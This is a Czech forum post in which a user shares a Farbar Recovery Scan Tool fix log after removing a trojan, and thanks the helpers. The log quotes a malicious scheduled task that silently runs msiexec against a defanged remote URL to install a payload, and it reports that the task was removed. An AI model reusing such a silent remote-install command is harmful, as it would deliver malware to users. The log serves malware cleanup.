Re: Trojan překročil hradby
Napsal: 18 kvě 2017 19:09
Omlouvam se nebyl to log ale jen podrobnost z vyskakovaciho okna kdyz jsem pustil mozzilu.
Fix result of Farbar Recovery Scan Tool (x64) Version: 14-05-2017
Ran by Bender (18-05-2017 20:10:58) Run:1
Running from C:\Users\Bender\Desktop
Loaded Profiles: Bender (Available Profiles: Bender)
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
GroupPolicy: Restriction - Windows Defender <======= ATTENTION
C:\Users\Bender\AppData\Local\Qekikthagt
C:\ProgramData\DP45977C.lfl
Task: {2B773E96-4F1A-48F1-B830-0A9E32D039A4} - \Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic -> No File <==== ATTENTION
Task: {3D097CBA-3703-4C6D-ABBD-C5FD7EBF8BFB} - System32\Tasks\Microsoft\Windows\DeviceSettings\Sjerdom => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mm ... d=20170514 /q <==== ATTENTION
Task: {CEBBBB47-B4F5-4054-A1FD-15494A61434B} - \WPD\SqmUpload_S-1-5-21-1516928578-2532743376-384880014-1001 -> No File <==== ATTENTION
EmptyTemp:
ResetHosts:
End
*****************
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
"C:\Users\Bender\AppData\Local\Qekikthagt" => not found.
C:\ProgramData\DP45977C.lfl => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2B773E96-4F1A-48F1-B830-0A9E32D039A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B773E96-4F1A-48F1-B830-0A9E32D039A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MemoryDiagnostic\VideoMemoryDiagnostic => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3D097CBA-3703-4C6D-ABBD-C5FD7EBF8BFB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3D097CBA-3703-4C6D-ABBD-C5FD7EBF8BFB} => key removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\DeviceSettings\Sjerdom => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\DeviceSettings\Sjerdom => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CEBBBB47-B4F5-4054-A1FD-15494A61434B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CEBBBB47-B4F5-4054-A1FD-15494A61434B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-1516928578-2532743376-384880014-1001 => key removed successfully
ResetHosts: => Error: No automatic fix found for this entry.
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21333005 B
Java, Flash, Steam htmlcache => 390263080 B
Windows/system/drivers => 76810 B
Edge => 2212 B
Chrome => 0 B
Firefox => 386685750 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 7732 B
Bender => 109391785 B
RecycleBin => 0 B
EmptyTemp: => 871.5 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 20:11:05 ====
Děkuji mockrat ste nej.